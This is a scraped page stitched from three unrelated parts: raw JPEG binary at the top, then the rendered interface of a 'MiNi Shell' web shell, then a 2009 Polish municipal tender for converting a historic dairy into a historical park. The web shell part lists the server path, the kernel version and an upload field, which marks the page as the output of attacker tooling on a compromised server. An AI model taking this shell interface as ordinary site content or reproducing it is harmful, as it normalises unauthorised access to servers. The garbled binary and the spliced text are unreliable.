JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090921/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090921/160457-N-2009.html

<p class="kh_header"><b>Nowy Dwór Gdański: Przebudowa i zmiana sposobu użytkowania zabytkowej mleczarni w Nowym Dworze Gdańskim na Żuławski Park Historyczny</b><br>
<b>Numer ogłoszenia: 160457 - 2009; data zamieszczenia: 21.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gminy Nowy Dwór Gdański , ul. Wejhera 3, 82-100 Nowy Dwór Gdański, woj. pomorskie, tel. 055 2472401, faks 055 2472405.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.miastonowydwor.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i zmiana sposobu użytkowania zabytkowej mleczarni w Nowym Dworze Gdańskim na Żuławski Park Historyczny.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamówienie obejmuje przebudowę i zmianę sposobu użytkowania budynku zabytkowej mleczarni 
na budynek Żuławskiego Parku Historycznego (na terenie działek ewidencyjnych nr 477/5, 477/6, 477/10,477/11, 477/12 oraz 477/16 w obrębie 2, ul. Kopernika, Nowy Dwór Gdański), pełniącego funkcję ekspozycyjną, konferencyjną, oraz edukacyjną, a także remont elewacji, budowę parkingów, ciągów pieszych i pieszo-jezdnych, nasadzenia zieleni wraz z elementami drobnych form architektury:

1) Zagospodarowanie terenu:
- położenie nawierzchni z kostki betonowej (ciągi pieszo-jezdne i chodniki),
- odtworzenie istniejącej bramy i ogrodzenia,
- budowa parkingu: 27 stanowisk, w tym 2 dla samochodów osób niepełnosprawnych,
- zagospodarowanie terenów zielonych (posianie trawy, nasadzenie drzew),
- montaż lamp oświetlenia zewnętrznego,
- mała architektura (ławki, ogrodzenie, kraty pod drzewa, kosze, słupki parkingowe);
2) Roboty budowlane:
- rozbiórka elementów wymagających wymiany/naprawy (dachy, stropy, podłogi, ściany),
- wykonanie nowych i podbicie istniejących fundamentów/ław,
- wykonanie hydroizolacji pionowych i poziomych ścian i posadzek,
- wykonanie izolacji poziomych metodą iniekcji ciśnieniowej,
- odgrzybianie ścian, konstrukcji nośnych, usunięcie pęknięć i rys,
- remont istniejących i wykonanie nowych stropów, wieńców, trzpieni, nadproży,
- montaż nowego pokrycia i konstrukcji dachowej,
- docieplenie dachu i ścian od wewnątrz,
- montaż windy,
- wymiana stolarki okiennej i drzwiowej,
- wykonanie ścianek wewnętrznych, podłóg, tynków, okładzin, malowanie,
- renowacja elewacji, 
- wykonanie nowej klatki schodowej;

3) Roboty instalacyjne:
- wykonanie sieci i przyłączy wod. - kan. (przyłącze wody z hydrantem i studzienką wodomierzową, kanalizacja sanitarna i deszczowa),
- wykonanie wewnętrznych instalacji wod. - kan. (z białym montażem), instalacji c.o., instalacji wentylacji mechanicznej i grawitacyjnej,
- wykonanie wewnętrznej instalacji elektrycznej wraz z rozdzielnicami,
- wykonanie instalacji odgromowej i połączeń wyrównawczych,
- wykonanie instalacji telefonicznej, alarmowej, dedykowanej i audiowizualnej.

	Obiekt został wpisany do rejestru zabytków przez WKZ w Elblągu dnia 21.12.1994 pod numerem 410/94 (obecnie pod numerem 1499) i podlega ochronie konserwatorskiej.

2. W zakres zamówienia wchodzą wszystkie prace, materiały, urządzenia i usługi niezbędne 
do kompleksowego wykonania inwestycji - zarówno wynikające wprost z przedmiaru robót, jak również w nim nieujęte, a niezbędne do wykonania zadania, tj. np.: zagospodarowanie placu budowy, w tym: zaplecze budowy, ogrodzenie, drogi dojazdowe i montażowe oraz zasilanie w wodę i energię elektryczną, dozorowanie, telefon oraz prace porządkowe.

3. Roboty powinny być wykonane zgodnie ze Specyfikacją istotnych warunków zamówienia (SIWZ) 
wraz z załączonymi dokumentami.

4. Nazwy, symbole i znaki firmowe producentów, dane techniczne i opisy technologii, zostały podane w celu jak najdokładniejszego określenia elementów, urządzeń i materiałów, które mogą być użyte do realizacji przedmiotu zamówienia. Stanowią one jedynie wytyczne do zachowania odpowiednich standardów.
Zamawiający dopuszcza zastosowanie materiałów równoważnych opisywanym, w szczególności w zakresie:
	- gabarytów i konstrukcji (wielkość, rodzaj i liczba elementów składowych),
	- charakteru użytkowego (tożsamość funkcji),
	- charakterystyki materiałowej (rodzaj i jakość tworzywa),
	- parametrów technicznych (np. wytrzymałość, trwałość, konstrukcja, itp.),
	- wyglądu (struktura, faktura i barwa).

5. Zamawiający zaleca, aby Wykonawca przeprowadził wizję w terenie w celu ustalenia pełnego zakresu prac związanych z realizacją zamówienia.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.11.00.00-1, 45.30.00.00-0, 45.40.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: 150.000,00 zł 
(słownie: sto pięćdziesiąt tysięcy zł).

2. Wadium wnosi się przed upływem terminu składania ofert.
	W przypadku wnoszenia wadium w formie pieniężnej za termin wniesienia wadium przyjmuje się moment uznania rachunku bankowego Zamawiającego.

3. Wadium może być wnoszone w jednej lub kilku następujących formach:
	a) pieniądzu;
	b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
	    z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
	c) gwarancjach bankowych;
	d) gwarancjach ubezpieczeniowych;
	e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
	    z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
	    (Dz. U. z 2007 r. Nr 42, poz. 275).

4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:
Żuławski Bank Spółdzielczy Nowy Dwór Gdański Nr 89 8306 0003 0000 8006 2000 0040
w tytule: Wadium - Żuławski Park Historyczny ZP.RC/340-15/09.

5. Gwarancje i poręczenia wymienione złożone jako wadium muszą posiadać okres ważności nie krótszy 
niż okres związania ofertą, pod rygorem wykluczenia Wykonawcy z postępowania.

6. Oryginały dokumentów potwierdzających wniesienie wadium w formie innej niż w pieniądzu należy złożyć 
w Referacie Budżetowo - Księgowym Urzędu Miejskiego w Nowym Dworze Gdańskim (pokój nr 16) 
lub dołączyć do oferty.

7. Warunki zwrotu, zatrzymania oraz żądania ponownego wniesienia wadium określa art. 46 ustawy Prawo zamówień publicznych.

8. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, którzy nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu 
z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych oraz spełniają warunki udziału w postępowaniu (art. 22 ust. 1 pkt 1-3 ustawy Pzp), tj. Wykonawcy, którzy:

1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, a w szczególności:
1) w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizowali przynajmniej jedno zamówienie odpowiadające swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, 
tj. przynajmniej jedno zamówienie na roboty budowlane na obiekcie użyteczności publicznej, wpisanym 
do rejestru zabytków, o kubaturze minimum 3.500 m3, w zakres którego (lub - w zakres których łącznie) wchodziły co najmniej:
a) roboty polegające na budowie lub przebudowie obiektu 
     - o wartości powyżej 6.000.000,00 zł (każda),
b) roboty polegające na wykonaniu prac konserwatorskich ścian ceglanych 
     - o wartości powyżej 900.000 zł (każda),
c) roboty polegające na wykonaniu prac rozbiórkowych i wyburzeniowych 
     - o wartości powyżej 600.000 zł (każda).
Roboty opisane w pkt od a) do c) mogły zostać zrealizowane w ramach jednego zamówienia (jednej umowy), jak również łącznie w ramach kilku różnych.
2) dysponują lub będą dysponowali osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia, a w tym co najmniej:
a) jedną osobą - przewidzianą na Kierownika Budowy - posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, spełniającą wymagania określone w § 8 ust. 1 rozporządzenia Ministra Kultury z dnia 09.06.2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, 
a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych 
i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. z 2004 r. Nr 150, poz. 1579), posiadającą przynajmniej 5 lat doświadczenia jako kierownik budowy na zabytkach nieruchomych wpisanych do rejestru zabytków;
b) jedną osobą - przewidzianą na Kierownika Robót Drogowych - posiadającą uprawnienia budowlane 
do kierowania robotami budowlanymi bez ograniczeń lub w ograniczonym zakresie w specjalności konstrukcyjno-budowlanej lub drogowej, posiadającą co najmniej 3 lata doświadczenia jako kierownik robót drogowych;
c) jedną osobą - przewidzianą na Kierownika Robót Sanitarnych - posiadającą uprawnienia budowlane 
do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji 
i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, posiadającą co najmniej 
5 lat doświadczenia jako kierownik robót sanitarnych;
d) jedną osobą - przewidzianą na Kierownika Robót Elektrycznych - posiadającą uprawnienia budowlane 
do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie instalacji 
i urządzeń elektrycznych, posiadającą co najmniej 5 lat doświadczenia jako kierownik robót elektrycznych;
e) jedną osobą - przewidzianą na Kierownika Robót Telekomunikacyjnych - posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności telekomunikacyjnej bez ograniczeń, posiadającą co najmniej 3 lata doświadczenia jako kierownik robót telekomunikacyjnych;
f) jedną osobą - przewidzianą na Rzeczoznawcę Budowlanego - posiadającą uprawnienia rzeczoznawcy 
w specjalności konstrukcyjno-budowlanej oraz uprawnienia rzeczoznawcy Polskiego Stowarzyszenia Mykologów Budownictwa (PSMB) w specjalności mykologiczno-budowlanej;
g) jedną osobą - przewidzianą na Kierownika Robót Konserwatorskich - spełniającą wymagania określone 
w § 7 ust. 1 i rozporządzenia Ministra Kultury z dnia 09.06.2004 r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, 
a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych 
i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. z 2004 r. Nr 150, poz. 1579). Zamawiający wymaga również posiadania uprawnień rzeczoznawcy dzieł sztuki w specjalności: konserwacja i restauracja kamiennych elementów i detali architektonicznych oraz co najmniej 5 lat doświadczenia 
w kierowaniu robotami konserwatorskimi zabytków nieruchomych i realizacji minimum 5 robót konserwatorskich zabytków nieruchomych;
h) czterema osobami w Zespole Konserwacji Lica Ceglanego oraz Zapraw Murarskich - każda osoba musi posiadać wykształcenie wyższe, uzyskane po ukończeniu wyższych studiów, obejmujących wiadomości 
w tym zakresie, i praktykę zawodową w konserwacji lica ceglanego co najmniej 3 lata.

	Osoby, dla których wymagane jest posiadanie uprawnień budowlanych, stanowiących podstawę 
do wykonywania samodzielnych funkcji technicznych w budownictwie (Rozdział 2 ustawy Prawo budowlane 
z dnia 7 lipca 1994 r., tekst jednolity: Dz. U. z 2006 r. Nr 156, poz. 1118, z późn. zm.) muszą być wpisane 
na listę członków właściwej Izby samorządu zawodowego zgodnie z art. 6 ustawy z dnia 15 grudnia 2000 r. 
o samorządzie zawodowym architektów, inżynierów budownictwa i urbanistów (Dz. U. z 2001 r. Nr 5, poz. 42, z późn. zm.);

3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj. m.in.: 
a) w okresie ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, osiągnęli obrót w wysokości co najmniej 30.000.000 zł rocznie;
b) posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 8.000.000 zł;
c) posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę co najmniej 6.000.000 zł.


	Ocena spełnienia warunków dokonana będzie na podstawie złożonych dokumentów.

	Przy ocenie spełnienia warunków, o których mowa w pkt 1-3 przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia wielkości stanowiące o spełnieniu warunku będą zsumowane..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wymienione poniżej dokumenty powinny być oryginałami albo kopiami potwierdzonymi za zgodność 
z oryginałem przez osobę (osoby) uprawnioną do reprezentowania Wykonawcy na zewnątrz (pieczątka służbowa i podpis) zgodnie z postanowieniami aktualnego rejestru sądowego lub wpisem do ewidencji działalności gospodarczej albo przez osobę (osoby) posiadającą stosowne pełnomocnictwo, a w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - przez ustanowionego przez nich pełnomocnika lub przez Wykonawców, których one dotyczą.

	Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.


1. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności 
lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, Zamawiający żąda następujących oświadczeń i dokumentów:
1) oświadczenie o braku podstaw do wykluczenia na podstawie art. 22 ust. 1 pkt 4 ustawy Pzp (wzór stanowi Załącznik nr 2 do SIWZ).
	W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie to składa 
i podpisuje każdy z Wykonawców osobno;
2) oświadczenie o spełnianiu warunków udziału w postępowaniu (art. 22 ust. 1 pkt 1-3) oraz spełnianiu 
przez oferowane roboty budowlane wymagań określonych przez Zamawiającego (wzór stanowi Załącznik 
nr 3 do SIWZ).
	W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie to składa 
i podpisuje ustanowiony przez nich pełnomocnik w imieniu wszystkich Wykonawców wspólnie lub wszyscy Wykonawcy wspólnie;
3) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, 
że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne 
i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie 
na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione 
nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
5) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6) aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty, 
o których mowa w ppkt od 3) do 6) muszą dotyczyć każdego z Wykonawców.


2. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia, Zamawiający żąda następujących dokumentów:
1) wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, 
z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, 
że roboty te zostały wykonane należycie (wzór stanowi Załącznik nr 4 do SIWZ);
2) wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć 
w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (wzór stanowi Załącznik nr 5 do SIWZ);
3) pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ppkt 2), Wykonawca wskazał osoby, którymi będzie dysponował;
4) dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia (opisane w części dotyczącej warunków udziału w postępowaniu).


3. W celu potwierdzenia opisanego przez zamawiającego warunku znajdowania się przez wykonawcę 
w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Zamawiający żąda następujących dokumentów:
1) sprawozdania finansowe albo ich części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie 
z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, 
a w przypadku Wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inne dokumenty określające obroty oraz zobowiązania i należności - za okres trzech ostatnich lata obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;
2) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
3) polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności.


4. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1:
1) ppkt 3), 4) i 6) - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne 
albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności 
lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
2) ppkt 5) - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 
ustawy Pzp.

	Dokumenty, o których mowa w ppkt 1) lit a) i c) oraz w ppkt 2), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
	Dokument, o którym mowa w ppkt 1) lit b), powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy dotyczące terminów wystawienia stosuje się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.miastonowydwor.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Nowym Dworze Gdańskim, ul. Wejhera 3, pokój nr 9.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2009 godzina 12:00, miejsce: Ofertę należy złożyć w Urzędzie Miejskim w Nowym Dworze Gdańskim przy ul. Wejhera 3, w sekretariacie (pokój nr 17).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com